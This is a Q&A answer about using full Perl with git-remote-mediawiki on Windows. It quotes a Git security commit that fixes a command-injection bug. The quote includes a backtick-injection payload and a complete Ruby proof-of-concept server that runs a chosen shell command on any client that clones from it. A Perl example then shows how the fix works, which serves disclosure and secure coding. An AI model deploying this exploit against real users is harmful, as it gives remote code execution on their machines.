Question

msysgit ships minimal perl libraries.

I want to download some packages from CPAN so I need to use full perl libraries.

How to do that?

More specifically, I want to use the git-remote-mediawiki plugin. That's why a full installation of perl libraries is needed.


Solution

Check first (as in this article) whether modifying the PERL5LIB environment variable to reference that script is enough (modify git-cmd.bat):

set PERL5LIB=c:\path\to\git\contrib

Otherwise, for an external contrib perl script, like git-remote-mediawiki, you can try and execute it from a DOS session, with any recent Perl distribution installed (like Strawberry Perl, as mob recommends in the comment).

I would recommend using a git-cmd.bat (which properly sets the git PATH and HOME), with your own perl added first:

@set PATH=%git_install_root%\bin;%git_install_root%\mingw\bin;%git_install_root%\cmd;%PATH%
@rem let's add our perl:
@set PATH=path/to/yourPerl;%PATH%

This is independent of the msysgit installation, which relies on an old perl for a reason explained in the FAQ.

The reason is that we need to have an MSys version of Perl because we did not manage to compile the Subversion modules (which are written in C using POSIX features plain Windows does not offer, hence the need for MSys).


That seemed enough to get the script started, but the OP linquize adds in the comments:

I end up writing a wrapper program git-remote-mediawiki.exe to call the external perl and need to convert CRLF to LF before writing to stdout to git, otherwise git hangs if CRLF is received.


Note: git-remote-mediawiki is more robust with Git 2.29 (Q4 2020), which brings some modernization and fixes to the MediaWiki remote backend.

See commit 9a86064, commit 878d150, commit 4842a11, commit 2d6b08a, commit f8ab018, commit 1d42b4d, commit 2388541, commit 4f80bc9, commit dde66eb, commit 9ff2958, commit 730ecc1, commit 090850e, commit 128efae, commit 5e87dce, commit e35973b (21 Sep 2020), and commit 872977b, commit 442f5aa (16 Sep 2020) by Ævar Arnfjörð Bjarmason (avar).
See commit 96653ce (21 Sep 2020) by Simon Legner (simon04).
(Merged by Junio C Hamano -- gitster -- in commit 5a25615, 04 Oct 2020)

For example:

remote-mediawiki: convert to quoted run_git() invocation

Reported-by: Joern Schneeweisz
Signed-off-by: Ævar Arnfjörð Bjarmason

Change those callsites that are able to call run_safe() with a quoted list of arguments to do so.

This fixes a RCE (Remote Code Execution) bug in this transport helper reported by Joern Schneeweisz to the git-security mailing list.
The issue is being made public due to the relative obscurity of the remote-mediawiki code.

The security issue is that we'd execute a command like this via Perl's "open -|", where the $name is taken directly from the api.php response. So that a JSON response of e.g.:

[...]"title":"`id>/tmp/mw`:Main Page"[..]  

Would result in an invocation of:

git config --add remote.origin.namespaceCache "`id>/tmp/mw`:notANameSpace"  

From code such as this, which is being changed by this patch:

run_git(qq(config --add remote.${remotename}.namespaceCache "${name}:${store_id}"));  

So we'd execute an arbitrary command, and also put "remote.origin.namespaceCache=:notANameSpace" in the config.
With this change we quote all of this, so now we'll simply write "remote.origin.namespaceCache=``id>/tmp/x``:notANameSpace" into the config, and not execute any remote commands.

About the implementation: as noted in "Opening a filehandle into a command" (see also "Safe Pipe Opens"), this style of invoking open() has compatibility issues on Windows up to Perl 5.22.
However, Johannes Schindelin notes that we shouldn't worry about Windows in this context because (quoting a private E-Mail of his):

  1. The mediawiki helper has never been shipped as part of an official Git for Windows version. Neither has it ever been part of an official MSYS2 package. Which means that Windows users who want to use the mediawiki helper have to build Git themselves, which not many users seem to do.

  2. The last Git for Windows version to ship with Perl v5.22.x was Git for Windows v2.11.1; Since Git for Windows v2.12.0 (released on February 25th, 2017), only newer Perl versions were included.

So let's just use this open() API.
Grepping around shows that various other Perl code we ship such as gitweb etc. uses this way of calling open(), so we shouldn't have any issues with compatibility.

For further reference and future testing, here's working exploit code provided by Joern:

#!/usr/bin/ruby
# git client side RCE via `mediawiki` remote proof of concept
# Joern Schneeweisz - GitLab Security Research Team  

require 'sinatra'
set bind: '0.0.0.0'  

if not ARGV[0]
  puts "Please provide the shell command to be executed."
  exit -1
end

cmd = ARGV[0]
all_pages = sprintf('{"limits":{"allpages":500},"query":{"allpages":[{"pageid":1,"ns":3,"title":"`%s`:Main Page"}]}}', cmd)
revs = sprintf('{"query":{"pages":{"1":{"pageid":1,"ns":3,"title":"`%s`:Main Page","revisions":[{"revid":1,"parentid":0,"user":"MediaWiki default","timestamp":"2020-09-04T20:25:08Z","contentformat":"text/x-wiki","contentmodel":"wikitext","comment":"","*":"<al:MyLanguage/Help:Contents]"}]}}}}', cmd)
mainpage= sprintf('{"batchcomplete":"","query":{"pages":{"1":{"pageid":1,"ns":3,"title":"`%s`:Main Page","revisions":[{"revid":1,"parentid":0}]}}}}',cmd)  

post '/api.php' do
  if params[:list] == 'allpages'
    return all_pages
  end

  if params[:prop] == 'revisions'
    return revs
  end

  return mainpage
end

Which:

[...] should be run like: ruby wiki.rb 'id>/tmp/mw'.
Now when being cloned with git clone mediawiki::http://localhost:4567 the file /tmp/mw will be created during the clone process, containing the output of id.
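
The difference between the string form and the list form of open() that the commit message describes, as an added example that is not part of the original answer or of the Git patch. The helper names run_git_string and run_git_list are hypothetical, the name value is a constructed harmless sample, and a POSIX shell with git on PATH is assumed.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempfile);

# Constructed sample: a namespace name as it could arrive in an api.php
# response. Backticks mean command substitution if a shell parses the string.
my $name     = '`echo INJECTED`';
my $store_id = 'notANameSpace';

# Scratch config file so the demo never touches a real repository.
my (undef, $cfg) = tempfile(UNLINK => 1);

# BEFORE (hypothetical helper name): the command is one interpolated string,
# so perl runs it through /bin/sh and the shell evaluates the backticks.
sub run_git_string {
    my ($args) = @_;
    open(my $git, '-|', "git $args") or die "cannot run git: $!";
    my $out = do { local $/; <$git> };
    close($git);
    return $out // '';
}

# AFTER (hypothetical helper name): list form of open(); perl exec()s git
# directly and each element arrives as exactly one argv entry, unparsed.
sub run_git_list {
    my (@args) = @_;
    open(my $git, '-|', 'git', @args) or die "cannot run git: $!";
    my $out = do { local $/; <$git> };
    close($git);
    return $out // '';
}

my $key = 'remote.origin.namespaceCache';

# Same logical call, written both ways, appended to the scratch config.
run_git_string(qq(config --file "$cfg" --add $key "${name}:${store_id}"));
run_git_list('config', '--file', $cfg, '--add', $key, "${name}:${store_id}");

# Dump both stored values: one was rewritten by the shell, one is literal.
print run_git_list('config', '--file', $cfg, '--get-all', $key);
```

When auditing similar Perl helpers, any open(), system() or exec() call that receives a single interpolated string containing remote data deserves the same conversion to list form.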

Licensed under: CC-BY-SA with attribution